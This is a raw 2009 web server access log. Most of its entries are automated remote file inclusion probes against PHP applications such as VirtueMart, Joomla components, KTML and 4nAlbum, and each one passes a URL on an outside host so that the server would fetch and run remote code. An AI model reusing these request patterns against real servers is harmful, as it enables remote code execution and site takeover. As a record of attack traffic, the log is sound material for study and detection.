199.165.233.10 - - [27/Apr/2009:13:19:05 -0500] "GET /logs/access_log.1238889600//bbs/skin/zero_pic_gallery/list_notice.php//ask_password.php?dir=http://www.candidography.com/zero/1?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
199.165.233.10 - - [27/Apr/2009:13:19:05 -0500] "GET //bbs/skin/zero_pic_gallery/list_notice.php//ask_password.php?dir=http://www.candidography.com/zero/1?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
199.165.233.10 - - [27/Apr/2009:13:19:05 -0500] "GET /logs//bbs/skin/zero_pic_gallery/list_notice.php//ask_password.php?dir=http://www.candidography.com/zero/1?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
199.165.233.10 - - [27/Apr/2009:13:19:15 -0500] "GET /logs/access_log.1237680000//bbs/skin/zero_pic_gallery/list_notice.php//ask_password.php?dir=http://www.candidography.com/zero/1?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
199.165.233.10 - - [27/Apr/2009:13:19:17 -0500] "GET /logs/access_log.1237680000//bbs/skin/zero_pic_gallery/list_notice.php//ask_password.php?dir=http://www.candidography.com/zero/1?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
199.165.233.10 - - [27/Apr/2009:13:19:21 -0500] "GET /logs/access_log.1237680000//bbs/skin/zero_pic_gallery/list_notice.php//ask_password.php?dir=http://www.candidography.com/zero/1?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
207.182.137.218 - - [27/Apr/2009:13:19:46 -0500] "GET /logs/!rfihttp://reav1985.altervista.org/idv6.txt???? HTTP/1.1" 404 331 "-""libwww-perl/5.820"
207.182.137.218 - - [27/Apr/2009:13:19:46 -0500] "GET /!rfihttp://reav1985.altervista.org/idv6.txt???? HTTP/1.1" 404 326 "-""libwww-perl/5.820"
199.165.233.10 - - [27/Apr/2009:13:20:18 -0500] "GET /logs/access_log.1237680000//bbs/skin/zero_pic_gallery/list_notice.php//ask_password.php?dir=http://www.candidography.com/zero/1?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
69.64.34.249 - - [27/Apr/2009:13:20:22 -0500] "GET //?path%5Bdocroot%5D=http://isepic.tugaspeed.info/id.txt???? HTTP/1.1" 200 3245 "-""libwww-perl/5.805"
69.64.34.249 - - [27/Apr/2009:13:20:23 -0500] "GET /logs//?path%5Bdocroot%5D=http://isepic.tugaspeed.info/id.txt???? HTTP/1.1" 200 187156 "-""libwww-perl/5.805"
217.116.84.254 - - [27/Apr/2009:13:21:28 -0500] "GET /logs//bbs/skin/zero_pic_gallery/list_notice.php//ask_password.php?dir=http://www.candidography.com/zero/1?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
217.116.84.254 - - [27/Apr/2009:13:21:28 -0500] "GET /logs/access_log.1238889600//bbs/skin/zero_pic_gallery/list_notice.php//ask_password.php?dir=http://www.candidography.com/zero/1?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
217.116.84.254 - - [27/Apr/2009:13:21:31 -0500] "GET //bbs/skin/zero_pic_gallery/list_notice.php//ask_password.php?dir=http://www.candidography.com/zero/1?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
217.116.84.254 - - [27/Apr/2009:13:23:20 -0500] "GET /logs/access_log.1237680000//bbs/skin/zero_pic_gallery/list_notice.php//ask_password.php?dir=http://www.candidography.com/zero/1?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
81.176.226.100 - - [27/Apr/2009:13:23:38 -0500] "GET /logs//?path%5Bdocroot%5D=http://data.donkeyhote.co.kr/xsl/copyright.txt?? HTTP/1.1" 200 187156 "-""libwww-perl/5.805"
81.176.226.100 - - [27/Apr/2009:13:23:39 -0500] "GET //?path%5Bdocroot%5D=http://data.donkeyhote.co.kr/xsl/copyright.txt?? HTTP/1.1" 200 3245 "-""libwww-perl/5.805"
125.251.133.3 - - [27/Apr/2009:13:26:25 -0500] "GET /logs//bbs/skin/zero_pic_gallery/list_notice.php//list_notice.php?dir=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
125.251.133.3 - - [27/Apr/2009:13:26:25 -0500] "GET //bbs/skin/zero_pic_gallery/list_notice.php//list_notice.php?dir=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
125.251.133.3 - - [27/Apr/2009:13:26:32 -0500] "GET /logs/access_log.1238889600//bbs/skin/zero_pic_gallery/list_notice.php//list_notice.php?dir=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 369 "-""Mozilla/5.0"
125.251.133.3 - - [27/Apr/2009:13:27:22 -0500] "GET /logs/access_log.1237680000//bbs/skin/zero_pic_gallery/list_notice.php//list_notice.php?dir=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 369 "-""Mozilla/5.0"
78.129.214.105 - - [27/Apr/2009:13:28:44 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://plengeh.co.cc/scripts/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
78.129.214.105 - - [27/Apr/2009:13:28:44 -0500] "GET /logs/access_log.1239321600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://plengeh.co.cc/scripts/id1.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
78.129.214.105 - - [27/Apr/2009:13:28:44 -0500] "GET /logs/access_log.1239235200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://plengeh.co.cc/scripts/id1.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
78.129.214.105 - - [27/Apr/2009:13:28:44 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://plengeh.co.cc/scripts/id1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
62.140.23.192 - - [27/Apr/2009:13:28:52 -0500] "GET /logs/access_log.1239408000///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 362 "-""Mozilla/5.0"
62.140.23.192 - - [27/Apr/2009:13:28:52 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 340 "-""Mozilla/5.0"
62.140.23.192 - - [27/Apr/2009:13:28:52 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
62.140.23.192 - - [27/Apr/2009:13:29:32 -0500] "GET /logs/access_log.1239235200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 362 "-""Mozilla/5.0"
83.226.185.169 - - [27/Apr/2009:13:30:48 -0500] "GET /logs/access_log.1239321600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://awalaboy.t35.com/id.txt%0D? HTTP/1.1" 404 362 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
83.226.185.169 - - [27/Apr/2009:13:30:48 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://awalaboy.t35.com/id.txt%0D? HTTP/1.1" 404 335 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
83.226.185.169 - - [27/Apr/2009:13:30:48 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://awalaboy.t35.com/id.txt%0D? HTTP/1.1" 404 340 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
78.129.214.105 - - [27/Apr/2009:13:30:55 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://awalaboy.t35.com/id.txt%0D? HTTP/1.1" 404 340 "-""Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
78.129.214.105 - - [27/Apr/2009:13:30:55 -0500] "GET /logs/access_log.1239321600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://awalaboy.t35.com/id.txt%0D? HTTP/1.1" 404 362 "-""Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
78.129.214.105 - - [27/Apr/2009:13:30:55 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://awalaboy.t35.com/id.txt%0D? HTTP/1.1" 404 335 "-""Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
83.226.185.169 - - [27/Apr/2009:13:30:56 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://awalaboy.t35.com/id.txt%0D? HTTP/1.1" 404 335 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
83.226.185.169 - - [27/Apr/2009:13:30:56 -0500] "GET /logs/access_log.1239321600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://awalaboy.t35.com/id.txt%0D? HTTP/1.1" 404 362 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
83.226.185.169 - - [27/Apr/2009:13:30:56 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://awalaboy.t35.com/id.txt%0D? HTTP/1.1" 404 340 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
83.226.185.169 - - [27/Apr/2009:13:30:56 -0500] "GET /logs/access_log.1239321600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://awalaboy.t35.com/id.txt%0D? HTTP/1.1" 404 362 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
83.226.185.169 - - [27/Apr/2009:13:30:56 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://awalaboy.t35.com/id.txt%0D? HTTP/1.1" 404 335 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
83.226.185.169 - - [27/Apr/2009:13:30:56 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://awalaboy.t35.com/id.txt%0D? HTTP/1.1" 404 340 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
83.226.185.169 - - [27/Apr/2009:13:31:06 -0500] "GET /logs/access_log.1239235200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://awalaboy.t35.com/id.txt%0D? HTTP/1.1" 404 362 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
83.226.185.169 - - [27/Apr/2009:13:31:10 -0500] "GET /logs/access_log.1239235200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://awalaboy.t35.com/id.txt%0D? HTTP/1.1" 404 362 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
83.226.185.169 - - [27/Apr/2009:13:31:15 -0500] "GET /logs/access_log.1239235200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://awalaboy.t35.com/id.txt%0D? HTTP/1.1" 404 362 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
83.226.185.169 - - [27/Apr/2009:13:31:23 -0500] "GET /logs/access_log.1239321600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://awalaboy.t35.com/id.txt%0D? HTTP/1.1" 404 362 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
83.226.185.169 - - [27/Apr/2009:13:31:23 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://awalaboy.t35.com/id.txt%0D? HTTP/1.1" 404 335 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
83.226.185.169 - - [27/Apr/2009:13:31:23 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://awalaboy.t35.com/id.txt%0D? HTTP/1.1" 404 340 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
78.129.214.105 - - [27/Apr/2009:13:31:23 -0500] "GET /logs/access_log.1239235200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://awalaboy.t35.com/id.txt%0D? HTTP/1.1" 404 362 "-""Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
83.226.185.169 - - [27/Apr/2009:13:31:41 -0500] "GET /logs/access_log.1239235200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://awalaboy.t35.com/id.txt%0D? HTTP/1.1" 404 362 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
65.55.208.143 - - [27/Apr/2009:13:37:01 -0500] "GET /logs/access_log.1168646400 HTTP/1.1" 200 640 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
202.111.175.179 - - [27/Apr/2009:13:37:47 -0500] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.landran.ca/image/sistem.gif??? HTTP/1.1" 404 324 "-""libwww-perl/5.79"
202.111.175.179 - - [27/Apr/2009:13:37:47 -0500] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.landran.ca/image/sistem.gif??? HTTP/1.1" 404 319 "-""libwww-perl/5.79"
125.251.133.3 - - [27/Apr/2009:13:38:08 -0500] "GET //bbs/skin/zero_pic_gallery/list_notice.php//list_notice.php?dir=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
125.251.133.3 - - [27/Apr/2009:13:38:08 -0500] "GET /logs//bbs/skin/zero_pic_gallery/list_notice.php//list_notice.php?dir=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
125.251.133.3 - - [27/Apr/2009:13:38:19 -0500] "GET /logs/access_log.1238889600//bbs/skin/zero_pic_gallery/list_notice.php//list_notice.php?dir=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 369 "-""Mozilla/5.0"
125.251.133.3 - - [27/Apr/2009:13:40:09 -0500] "GET /logs/access_log.1237680000//bbs/skin/zero_pic_gallery/list_notice.php//list_notice.php?dir=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 369 "-""Mozilla/5.0"
78.129.214.105 - - [27/Apr/2009:13:42:13 -0500] "GET /logs/access_log.1239408000///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://plengeh.co.cc/scripts/id1.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
78.129.214.105 - - [27/Apr/2009:13:44:21 -0500] "GET //ask_password.php?dir=http://awalaboy.t35.com/id.txt%0D? HTTP/1.1" 404 300 "-""Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
78.129.214.105 - - [27/Apr/2009:13:44:21 -0500] "GET /logs/access_log.1234224000//ask_password.php?dir=http://awalaboy.t35.com/id.txt%0D? HTTP/1.1" 404 327 "-""Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
78.129.214.105 - - [27/Apr/2009:13:44:21 -0500] "GET /logs//ask_password.php?dir=http://awalaboy.t35.com/id.txt%0D? HTTP/1.1" 404 305 "-""Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
78.129.214.105 - - [27/Apr/2009:13:44:21 -0500] "GET /logs/access_log.1231718400//ask_password.php?dir=http://awalaboy.t35.com/id.txt%0D? HTTP/1.1" 404 327 "-""Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
83.226.185.169 - - [27/Apr/2009:13:46:03 -0500] "GET /logs/access_log.1233964800//ask_password.php?dir=http://awalaboy.t35.com/id.txt%0D? HTTP/1.1" 404 327 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
83.226.185.169 - - [27/Apr/2009:13:46:03 -0500] "GET /logs//ask_password.php?dir=http://awalaboy.t35.com/id.txt%0D? HTTP/1.1" 404 305 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
83.226.185.169 - - [27/Apr/2009:13:46:03 -0500] "GET /logs/access_log.1234137600//ask_password.php?dir=http://awalaboy.t35.com/id.txt%0D? HTTP/1.1" 404 327 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
83.226.185.169 - - [27/Apr/2009:13:46:03 -0500] "GET //ask_password.php?dir=http://awalaboy.t35.com/id.txt%0D? HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
83.226.185.169 - - [27/Apr/2009:13:46:07 -0500] "GET /logs/access_log.1234137600//ask_password.php?dir=http://awalaboy.t35.com/id.txt%0D? HTTP/1.1" 404 327 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
83.226.185.169 - - [27/Apr/2009:13:46:07 -0500] "GET //ask_password.php?dir=http://awalaboy.t35.com/id.txt%0D? HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
83.226.185.169 - - [27/Apr/2009:13:46:07 -0500] "GET /logs//ask_password.php?dir=http://awalaboy.t35.com/id.txt%0D? HTTP/1.1" 404 305 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
83.226.185.169 - - [27/Apr/2009:13:46:07 -0500] "GET /logs/access_log.1233964800//ask_password.php?dir=http://awalaboy.t35.com/id.txt%0D? HTTP/1.1" 404 327 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
83.226.185.169 - - [27/Apr/2009:13:46:09 -0500] "GET //ask_password.php?dir=http://awalaboy.t35.com/id.txt%0D? HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
83.226.185.169 - - [27/Apr/2009:13:46:09 -0500] "GET /logs/access_log.1234137600//ask_password.php?dir=http://awalaboy.t35.com/id.txt%0D? HTTP/1.1" 404 327 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
83.226.185.169 - - [27/Apr/2009:13:46:09 -0500] "GET /logs//ask_password.php?dir=http://awalaboy.t35.com/id.txt%0D? HTTP/1.1" 404 305 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
83.226.185.169 - - [27/Apr/2009:13:46:32 -0500] "GET /logs/access_log.1233964800//ask_password.php?dir=http://awalaboy.t35.com/id.txt%0D? HTTP/1.1" 404 327 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
83.226.185.169 - - [27/Apr/2009:13:47:53 -0500] "GET /logs/access_log.1234137600//ask_password.php?dir=http://awalaboy.t35.com/id.txt%0D? HTTP/1.1" 404 327 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
83.226.185.169 - - [27/Apr/2009:13:47:53 -0500] "GET //ask_password.php?dir=http://awalaboy.t35.com/id.txt%0D? HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
83.226.185.169 - - [27/Apr/2009:13:47:53 -0500] "GET /logs//ask_password.php?dir=http://awalaboy.t35.com/id.txt%0D? HTTP/1.1" 404 305 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
83.226.185.169 - - [27/Apr/2009:13:47:53 -0500] "GET /logs/access_log.1233964800//ask_password.php?dir=http://awalaboy.t35.com/id.txt%0D? HTTP/1.1" 404 327 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
200.103.16.43 - - [27/Apr/2009:13:52:25 -0500] "GET /logs/access_log.1239235200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://plengeh.co.cc/scripts/id1.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
200.103.16.43 - - [27/Apr/2009:13:52:25 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://plengeh.co.cc/scripts/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
200.103.16.43 - - [27/Apr/2009:13:52:25 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://plengeh.co.cc/scripts/id1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
200.103.16.43 - - [27/Apr/2009:13:52:28 -0500] "GET /logs/access_log.1239321600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://plengeh.co.cc/scripts/id1.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
203.97.95.186 - - [27/Apr/2009:13:53:14 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.vueltacarnero.com//////////modules/Roseid.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.79"
203.97.95.186 - - [27/Apr/2009:13:53:15 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.vueltacarnero.com//////////modules/Roseid.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
65.55.208.131 - - [27/Apr/2009:13:54:28 -0500] "GET /logs/access_log.1189641600 HTTP/1.1" 200 1611 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
121.165.73.157 - - [27/Apr/2009:13:58:43 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
121.165.73.157 - - [27/Apr/2009:13:58:43 -0500] "GET /logs/access_log.1239408000///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 362 "-""Mozilla/5.0"
121.165.73.157 - - [27/Apr/2009:13:58:43 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 340 "-""Mozilla/5.0"
64.191.102.117 - - [27/Apr/2009:14:00:13 -0500] "GET /logs/components/com_magazine/magazine.html.php?mosConfig_absolute_path=http://www.thenakedtruckerandt-bones.com/echo.txt???? HTTP/1.1" 404 329 "-""libwww-perl/5.822"
64.191.102.117 - - [27/Apr/2009:14:00:13 -0500] "GET /components/com_magazine/magazine.html.php?mosConfig_absolute_path=http://www.thenakedtruckerandt-bones.com/echo.txt???? HTTP/1.1" 404 324 "-""libwww-perl/5.822"
118.219.232.137 - - [27/Apr/2009:14:01:51 -0500] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.sunggong.tv/bc/shirohige/fxid.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
118.219.232.137 - - [27/Apr/2009:14:01:52 -0500] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.sunggong.tv/bc/shirohige/fxid.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
118.219.232.137 - - [27/Apr/2009:14:01:52 -0500] "GET /logs/access_log.1234828800//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.sunggong.tv/bc/shirohige/fxid.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
118.219.232.137 - - [27/Apr/2009:14:02:31 -0500] "GET /logs/access_log.1234915200//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.sunggong.tv/bc/shirohige/fxid.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
72.55.164.230 - - [27/Apr/2009:14:04:54 -0500] "GET /config.php?inc_dir=http://208.89.209.205/roundcubemail-0.1.1/temp/fx29id?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
72.55.164.230 - - [27/Apr/2009:14:04:56 -0500] "GET /logs/config.php?inc_dir=http://208.89.209.205/roundcubemail-0.1.1/temp/fx29id?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
72.55.164.230 - - [27/Apr/2009:14:04:56 -0500] "GET /logs/access_log.1238112000/config.php?inc_dir=http://208.89.209.205/roundcubemail-0.1.1/temp/fx29id?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
209.62.42.242 - - [27/Apr/2009:14:07:06 -0500] "GET /logs/access_log.1236902400/popup_window.php?site_isp_root=http://www.freeimagehosting.net/uploads/faa2cb3307.jpg?? HTTP/1.1" 404 326 "-""libwww-perl/5.810"
209.62.42.242 - - [27/Apr/2009:14:07:07 -0500] "GET /logs/access_log.1236902400/popup_window.php?site_isp_root=http://www.freeimagehosting.net/uploads/04dff96c74.jpg?? HTTP/1.1" 404 326 "-""libwww-perl/5.810"
217.172.186.250 - - [27/Apr/2009:14:13:03 -0500] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
217.172.186.250 - - [27/Apr/2009:14:13:03 -0500] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
217.172.186.250 - - [27/Apr/2009:14:13:03 -0500] "GET /logs/access_log.1238889600//modules/4nAlbum/public/displayCategory.php?basepath=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
217.172.186.250 - - [27/Apr/2009:14:14:21 -0500] "GET /logs/access_log.1238112000//modules/4nAlbum/public/displayCategory.php?basepath=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
209.62.42.242 - - [27/Apr/2009:14:14:25 -0500] "GET /logs/access_log.1233619200/popup_window.php?site_isp_root=http://www.freeimagehosting.net/uploads/faa2cb3307.jpg?? HTTP/1.1" 404 326 "-""libwww-perl/5.810"
209.62.42.242 - - [27/Apr/2009:14:14:25 -0500] "GET /logs/access_log.1233619200/popup_window.php?site_isp_root=http://www.freeimagehosting.net/uploads/04dff96c74.jpg?? HTTP/1.1" 404 326 "-""libwww-perl/5.810"
68.112.43.9 - - [27/Apr/2009:14:15:06 -0500] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.eforel.com/ecommerce/images/simplelists/r8? HTTP/1.1" 404 331 "-""libwww-perl/5.803"
68.112.43.9 - - [27/Apr/2009:14:15:06 -0500] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.eforel.com/ecommerce/images/simplelists/r8? HTTP/1.1" 404 326 "-""libwww-perl/5.803"
209.62.42.242 - - [27/Apr/2009:14:15:20 -0500] "GET /logs/access_log.1237161600/popup_window.php?site_isp_root=http://www.freeimagehosting.net/uploads/faa2cb3307.jpg?? HTTP/1.1" 404 326 "-""libwww-perl/5.810"
209.62.42.242 - - [27/Apr/2009:14:15:20 -0500] "GET /logs/access_log.1237161600/popup_window.php?site_isp_root=http://www.freeimagehosting.net/uploads/04dff96c74.jpg?? HTTP/1.1" 404 326 "-""libwww-perl/5.810"
68.112.43.9 - - [27/Apr/2009:14:21:46 -0500] "GET /logs/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.eforel.com/ecommerce/images/simplelists/r8? HTTP/1.1" 404 323 "-""libwww-perl/5.803"
68.112.43.9 - - [27/Apr/2009:14:21:46 -0500] "GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.eforel.com/ecommerce/images/simplelists/r8? HTTP/1.1" 404 318 "-""libwww-perl/5.803"
210.68.188.206 - - [27/Apr/2009:14:22:58 -0500] "GET /logs/access_log.1239321600/index.php?meio=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
210.68.188.206 - - [27/Apr/2009:14:22:58 -0500] "GET /index.php?meio=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 292 "-""Mozilla/5.0"
210.68.188.206 - - [27/Apr/2009:14:22:58 -0500] "GET /logs/index.php?meio=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
